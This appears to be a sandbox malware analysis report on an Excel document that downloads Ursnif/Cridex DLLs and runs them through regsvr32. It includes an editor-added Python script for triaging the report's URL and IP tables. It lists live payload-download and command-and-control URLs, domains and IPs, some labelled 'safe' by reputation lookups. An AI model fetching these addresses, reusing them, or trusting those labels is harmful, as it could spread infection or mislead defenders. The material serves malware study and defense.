                Source: C:\Windows\SysWOW64\regsvr32.exe  Code function: 1_2_66DF0133 ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA
                Source: C:\Windows\SysWOW64\regsvr32.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                Source: C:\Windows\SysWOW64\regsvr32.exe  Code function: 1_2_66DB1979 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError
                Source: C:\Windows\SysWOW64\regsvr32.exe  Code function: 1_2_66DB146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
                Source: C:\Windows\SysWOW64\regsvr32.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                Stealing of Sensitive Information:

                Yara detected Ursnif
                Source: Yara match  File source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match  File source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
                Source: Yara match  File source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
                Yara detected Ursnif
                Source: Yara match  File source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY

                Remote Access Functionality:

                Yara detected Ursnif
                Source: Yara match  File source: 00000001.00000003.714853915.00000000041D0000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara match  File source: 1.2.regsvr32.exe.66db0000.3.unpack, type: UNPACKEDPE
                Source: Yara match  File source: 1.3.regsvr32.exe.41d8d29.0.raw.unpack, type: UNPACKEDPE
                Yara detected Ursnif
                Source: Yara match  File source: 00000001.00000003.838086006.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: 00000001.00000003.838133598.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: 00000001.00000003.838242491.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: 00000001.00000003.838283441.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: 00000001.00000003.838186200.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: 00000001.00000003.838303300.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: 00000001.00000003.838219615.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: 00000001.00000003.838266816.0000000005098000.00000004.00000040.sdmp, type: MEMORY
                Source: Yara match  File source: Process Memory Space: regsvr32.exe PID: 7148, type: MEMORY

                Mitre Att&ck Matrix

                Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                Valid Accounts | Windows Management Instrumentation2 | DLL Side-Loading1 | Process Injection2 | Masquerading111 | OS Credential Dumping | System Time Discovery1 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                Default Accounts | Scripting2 | Boot or Logon Initialization Scripts | DLL Side-Loading1 | Disable or Modify Tools1 | LSASS Memory | Security Software Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer13 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                Domain Accounts | Native API1 | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion1 | Security Account Manager | Query Registry1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                Local Accounts | Exploitation for Client Execution4 | Logon Script (Mac) | Logon Script (Mac) | Process Injection2 | NTDS | Virtualization/Sandbox Evasion1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol13 | SIM Card Swap |  | Carrier Billing Fraud
                Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Scripting2 | LSA Secrets | Process Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
                Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information1 | Cached Domain Credentials | File and Directory Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
                External Remote Services | Scheduled Task | Startup Items | Startup Items | Regsvr321 | DCSync | System Information Discovery25 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
                Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | DLL Side-Loading1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

                Behavior Graph

                Behavior Graph ID: 403127  Sample: 6613n246zm543w.xlsb  Startdate: 03/05/2021  Architecture: WINDOWS  Score: 100

                Signatures on the sample node: Found malware configuration; Multi AV Scanner detection for dropped file; Document exploit detected (drops PE files); 8 other signatures

                Process tree and network activity shown in the graph:

                • EXCEL.EXE (started)
                  DNS/IP: docs.atu.ngr.mybluehost.me 162.241.24.47, ports 49740, 80, UNIFIEDLAYER-AS-1US United States
                  Dropped files: C:\Users\user\AppData\...\presentation[1].dll (PE32); C:\Users\Public\block.dll (PE32); C:\Users\user\Desktop\~$6613n246zm543w.xlsb (data)
                  Signatures: Document exploit detected (creates forbidden files); Document exploit detected (UrlDownloadToFile)
                  • regsvr32.exe (started by EXCEL.EXE)
                    Signatures: Writes or reads registry keys via WMI; Writes registry values via WMI
                • iexplore.exe (started)
                  • iexplore.exe (child)
                    DNS/IP: app.buboleinov.com 34.86.224.8, ports 49764, 49765, 49779, GOOGLEUS United States
                • iexplore.exe (started)
                  • iexplore.exe (child)
                    DNS: chat.billionady.com
                • iexplore.exe (started)
                  • iexplore.exe (child)
                    DNS: app3.maintorna.com

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                No Antivirus matches

                Dropped Files

                Source | Detection | Scanner | Label
                C:\Users\Public\block.dll | 13% | ReversingLabs | Win32.Worm.Cridex
                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\presentation[1].dll | 13% | ReversingLabs | Win32.Worm.Cridex

                Unpacked PE Files

                Source | Detection | Scanner | Label
                1.2.regsvr32.exe.27f0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168

                Domains

                No Antivirus matches

                URLs


                Domains and IPs

                Contacted Domains

                Name | IP | Active | Malicious | Antivirus Detection | Reputation
                app3.maintorna.com | 34.86.224.8 | true | false |  | unknown
                chat.billionady.com | 34.86.224.8 | true | false |  | unknown
                app.buboleinov.com | 34.86.224.8 | true | false |  | unknown
                docs.atu.ngr.mybluehost.me | 162.241.24.47 | true | false |  | high

                        Contacted URLs

                Name | Malicious | Antivirus Detection | Reputation
                http://docs.atu.ngr.mybluehost.me/presentation.dll | false |  | high
                http://app.buboleinov.com/z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf0x6FbAwTSzE/j2W2tGJ3BJZvVbX11_2BUV/fpUC_2B6Q9mfu/3o2_2B46/OLYUaNQoAWvs_2FbvG_2BKH/7iWhqlNtvD/J2yWSfQ76dcAKMFuZ/3mJsX_2Bs0FH/qiS1vq47Ihl/qYjn0Yg7_2Fs22/uUYx5ZbSNGvuUqs3cskdX/qwpRyPlhL_2FkPNb/1rre5N02_2FaPz2/bBs8grMdfh07gYK5nT/9gtPy0LuP/wYiN2jeiY_2BAyR8pqAH/pP4fdKjSstJgODzp7LO/GGc_2F8syE1Y/XZR_2F6_2/Fm | false | Avira URL Cloud: safe | unknown
                http://app3.maintorna.com/F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/4wB0QgN10EkpX/AcOnUpOy/sx6xA_2BQgCwb8YrqbLddxV/OJDcwH612j/SgvuMvjnhyj_2BJZu/QEAjCzH7iakZ/oq21_2FJOeJ/SwjqqZOEiD8hxw/G5RB86oNRHPQeS1WmQofx/9xSmKamg1DMw2k9J/4izLK3dr4GQOE25/kgxEQPFLWO2XCIrGa5/PGMRBxlzM/0Ejxm5VgBpRdVV0sXhjU/M_2BEEG31ubNw2v0Fmu/Lkyp4hip_2Fjy_2FVx4B63/WkF_2BbbsvI0l/DMReAFgM/oHuJg | false | Avira URL Cloud: safe | unknown
                http://chat.billionady.com/pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVKXUKrMq/O25bJi9K6cy2wBFt/EYfe_2FKkVGOswo/zrljXUlqaCddZUQdMz/46rOG0TD7/jSwGOmqtlI1lhZnMTkpj/OVdYkB6bCvlTi8j76Hq/ls7qgwy0MLToWsmBH4qSen/tk209OxMyhspY/JW_2B_2B/JDgZlFf6GkmqLMRn5B4cp37/KRW8p6Kt3j/I1_2FzkkwDlUgXN_2/B8sJnr99OISw/18ko4KjrRQ1/26TtcKYNzHhDSL/9AqfJNAejPb1kyuCVpyID/xExOyq0w/s | false | Avira URL Cloud: safe | unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://api.diagnosticssdf.office.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                            high
                            https://login.microsoftonline.com/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                              high
                              https://shell.suite.office.com:144351B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                high
                                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                  high
                                  https://autodiscover-s.outlook.com/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                      high
                                      https://cdn.entity.51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      unknown
                                      https://api.addins.omex.office.net/appinfo/query51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                        high
                                        https://clients.config.office.net/user/v1.0/tenantassociationkey51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                          high
                                          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                            high
                                            http://chat.billionady.com/pGAWsdPZsgmlp8IeD/HimMWYQD3vgj/nWrp3CJhfHJ/OCZulU9DF2vABL/EGqK7P_2BoREnVK{FF57CED8-AC37-11EB-90EB-ECF4BBEA1588}.dat.24.dr, ~DFE7296AD5C85F4BE9.TMP.24.drfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://powerlift.acompli.net51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://rpsticket.partnerservices.getmicrosoftkey.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://lookup.onenote.com/lookup/geolocation/v151B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                              high
                                              https://cortana.ai51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                high
                                                https://cloudfiles.onenote.com/upload.aspx51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                  high
                                                  https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                    high
                                                    https://entitlement.diagnosticssdf.office.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                      high
                                                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                        high
                                                        https://api.aadrm.com/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://ofcrecsvcapi-int.azurewebsites.net/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                          high
                                                          https://api.microsoftstream.com/api/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                            high
                                                            https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                              high
                                                              https://cr.office.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                high
                                                                https://portal.office.com/account/?ref=ClientMeControl51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                  high
                                                                  http://www.reddit.com/msapplication.xml4.18.drfalse
                                                                    high
                                                                    https://ecs.office.com/config/v2/Office51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                      high
                                                                      https://graph.ppe.windows.net51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                        high
                                                                        https://res.getmicrosoftkey.com/api/redemptionevents51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://powerlift-frontdesk.acompli.net51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        https://tasks.office.com51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                          high
                                                                          https://officeci.azurewebsites.net/api/51B28365-1D64-4B17-A13C-644DC8E32C4F.0.drfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
URL | Source | Malicious | Antivirus Detection | Reputation
https://sr.outlook.office.net/ws/speech/recognize/assistant/work | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
http://app.buboleinov.com/z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf | {E4D8D280-AC37-11EB-90EB-ECF4BBEA1588}.dat.18.dr, ~DFEF08F5C4CE8758CE.TMP.18.dr | false | Avira URL Cloud: safe | unknown
https://store.office.cn/addinstemplate | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | URL Reputation: safe (×3) | unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid= | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://globaldisco.crm.dynamics.com | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://store.officeppe.com/addinstemplate | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | URL Reputation: safe (×3) | unknown
https://dev0-api.acompli.net/autodetect | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | URL Reputation: safe (×3) | unknown
https://www.odwebp.svc.ms | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | URL Reputation: safe (×3) | unknown
https://api.powerbi.com/v1.0/myorg/groups | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://web.microsoftstream.com/video/ | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://graph.windows.net | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://dataservice.o365filtering.com/ | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | URL Reputation: safe (×3) | unknown
https://officesetup.getmicrosoftkey.com | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | URL Reputation: safe (×3) | unknown
https://analysis.windows.net/powerbi/api | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://prod-global-autodetect.acompli.net/autodetect | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | URL Reputation: safe (×3) | unknown
https://outlook.office365.com/autodiscover/autodiscover.json | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
http://www.youtube.com/ | msapplication.xml7.18.dr | false | - | high
https://ncus.contentsync. | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | URL Reputation: safe (×3) | unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/ | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
http://weather.service.msn.com/data.aspx | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://apis.live.net/v5.0/ | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | URL Reputation: safe (×3) | unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://management.azure.com | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://wus2.contentsync. | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | URL Reputation: safe (×3) | unknown
https://incidents.diagnostics.office.com | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://clients.config.office.net/user/v1.0/ios | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
http://app3.maintorna.com/F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/ | {0D9072B2-AC38-11EB-90EB-ECF4BBEA1588}.dat.27.dr, ~DFC4112F6E645ECEC7.TMP.27.dr | false | Avira URL Cloud: safe | unknown
https://insertmedia.bing.office.net/odc/insertmedia | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://o365auditrealtimeingestion.manage.office.com | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://outlook.office365.com/api/v1.0/me/Activities | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://api.office.net | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://incidents.diagnosticssdf.office.com | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://asgsmsproxyapi.azurewebsites.net/ | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | Avira URL Cloud: safe | unknown
https://clients.config.office.net/user/v1.0/android/policies | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
http://www.amazon.com/ | msapplication.xml.18.dr | false | - | high
https://entitlement.diagnostics.office.com | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
http://www.twitter.com/ | msapplication.xml5.18.dr | false | - | high
https://outlook.office.com/ | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://storage.live.com/clientlogs/uploadlocation | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://templatelogging.office.com/client/log | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://outlook.office365.com/ | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://webshell.suite.office.com | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://management.azure.com/ | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://login.windows.net/common/oauth2/authorize | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | URL Reputation: safe (×3) | unknown
https://graph.windows.net/ | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://api.powerbi.com/beta/myorg/imports | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://devnull.onenote.com | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://ncus.pagecontentsync. | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | URL Reputation: safe (×3) | unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://messaging.office.com/ | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high
https://augloop.office.com/v2 | 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr | false | - | high

Contacted IPs

Map legend:
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs

Public

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
162.241.24.47 | docs.atu.ngr.mybluehost.me | United States | US | 46606 | UNIFIEDLAYER-AS-1 | false
34.86.224.8 | app3.maintorna.com | United States | US | 15169 | GOOGLE | false
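Two things in the tables above are easy to misread. First, the "Malicious: false" and "Avira URL Cloud: safe" verdicts on the app.buboleinov.com and app3.maintorna.com download URLs are reputation lookups: a download host that was not yet listed comes back "safe" or "unknown", which is not evidence that the content it served was benign. Second, most of the URL rows share the source 51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr, a single dropped Office settings file whose embedded vendor URLs the sandbox carves out as strings; only the rows sourced from the {GUID}.dat / ~DF*.TMP artifacts of processes 18 and 27 describe URLs that a process actually handled during the run. The script below is an added example by the editor, not part of the Joe Sandbox report: it applies exactly that two-axis triage (vendor-domain allowlist, then source-artifact kind) to a transcribed subset of the rows and joins the survivors with the Contacted IPs table. The allowlist and the artifact-kind heuristic are the editor's assumptions, labelled as such in the code.

```python
"""Triage helper for a sandbox report's URL and Contacted-IP tables.

Added example, not part of the Joe Sandbox report. It separates the hosts the
sample actually reached from the Office/IE vendor URLs that the sandbox carves
out of dropped configuration files, and joins the survivors with the IP table.
"""
import re
from urllib.parse import urlsplit

# (url, source artifact, reputation) rows transcribed from the report's URL
# table. Only a representative subset is embedded so the script runs offline.
URL_ROWS = [
    ("http://app.buboleinov.com/z641zbWI8F5NGo_/2BArU_2BbQAq9y6CQ2/iYglxzTUG/6THXjDZRni2_2BHtJ8xS/hQVd4Naf",
     "{E4D8D280-AC37-11EB-90EB-ECF4BBEA1588}.dat.18.dr, ~DFEF08F5C4CE8758CE.TMP.18.dr", "unknown"),
    ("http://app3.maintorna.com/F8d0aGGV7/IFlLstzk2tyypfn_2Fmm/U_2BnTF3_2BdKngQdqp/axZO_2FFau1L_2Bp8DkKab/",
     "{0D9072B2-AC38-11EB-90EB-ECF4BBEA1588}.dat.27.dr, ~DFC4112F6E645ECEC7.TMP.27.dr", "unknown"),
    ("https://asgsmsproxyapi.azurewebsites.net/", "51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr", "unknown"),
    ("https://outlook.office365.com/autodiscover/autodiscover.json", "51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr", "high"),
    ("https://login.windows.net/common/oauth2/authorize", "51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr", "high"),
    ("https://store.office.cn/addinstemplate", "51B28365-1D64-4B17-A13C-644DC8E32C4F.0.dr", "unknown"),
    ("http://www.youtube.com/", "msapplication.xml7.18.dr", "high"),
]
# (ip, domain, asn, asn name) rows transcribed from the Contacted IPs table.
IP_ROWS = [
    ("162.241.24.47", "docs.atu.ngr.mybluehost.me", "46606", "UNIFIEDLAYER-AS-1"),
    ("34.86.224.8", "app3.maintorna.com", "15169", "GOOGLE"),
]

# Analyst-maintained allowlist (an assumption of this example, not report
# data): domains Office 2016 and IE 11 ship as strings in their own files.
VENDOR_SUFFIXES = (
    "office.com", "office.net", "office365.com", "office.cn", "officeppe.com",
    "live.com", "live.net", "microsoft.com", "microsoftstream.com",
    "windows.net", "azure.com", "dynamics.com", "onenote.com", "acompli.net",
    "svc.ms", "lync.com", "msn.com", "outlook.com", "uservoice.com",
    "getmicrosoftkey.com", "o365filtering.com",
    "youtube.com", "amazon.com", "twitter.com",   # IE default pinned sites
)

PROC_RE = re.compile(r"\.(\d+)\.dr\b")   # ".18.dr" -> dropped by process #18


def host_of(url: str) -> str:
    return (urlsplit(url).hostname or "").lower()


def is_vendor_host(host: str) -> bool:
    return any(host == s or host.endswith("." + s) for s in VENDOR_SUFFIXES)


def source_kind(source: str) -> str:
    """Heuristic (assumption): {GUID}.dat and ~DF*.TMP files are runtime
    artifacts written while a URL was actually being handled, whereas a
    *.0.dr Office settings blob merely contains the URL as a string."""
    s = source.lower()
    if ".dat." in s or "~df" in s:
        return "runtime-artifact"
    if "msapplication.xml" in s:
        return "browser-default"
    if s.endswith(".0.dr"):
        return "office-config"
    return "other"


def triage(url_rows, ip_rows):
    """Return non-vendor URLs, most suspicious first, joined with IP data."""
    resolved = {domain: (ip, asn, name) for ip, domain, asn, name in ip_rows}
    iocs = []
    for url, source, reputation in url_rows:
        host = host_of(url)
        if is_vendor_host(host):
            continue
        ip, asn, name = resolved.get(host, (None, None, None))
        iocs.append({
            "host": host, "url": url, "kind": source_kind(source),
            "process_ids": sorted(set(PROC_RE.findall(source)), key=int),
            "reputation": reputation, "ip": ip, "asn": asn, "asn_name": name,
        })
    # Runtime artifacts first, then unknown reputation before well-known ones.
    iocs.sort(key=lambda r: (r["kind"] != "runtime-artifact",
                             r["reputation"] == "high", r["host"]))
    return iocs


def contacted_without_url(url_rows, ip_rows):
    """Domains in the IP table that never appear in the URL table."""
    seen = {host_of(u) for u, _, _ in url_rows}
    return [d for _, d, _, _ in ip_rows if d not in seen]


if __name__ == "__main__":
    for r in triage(URL_ROWS, IP_ROWS):
        print(f"{r['kind']:17} pids={r['process_ids']} {r['host']} -> {r['ip']} ({r['asn_name']})")
    print("resolved but no URL row:", contacted_without_url(URL_ROWS, IP_ROWS))
```

On the subset above the two download URLs rank first (runtime artifacts from processes 18 and 27, unknown reputation), the azurewebsites.net entry ranks below them because it was only found as a string in the Office settings file, and docs.atu.ngr.mybluehost.me is reported separately as a resolved domain that has no URL row in this subset, which is the cue to look for it elsewhere in the report.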

General Information

Joe Sandbox Version: 32.0.0 Black Diamond
Analysis ID: 403127
Start date: 03.05.2021
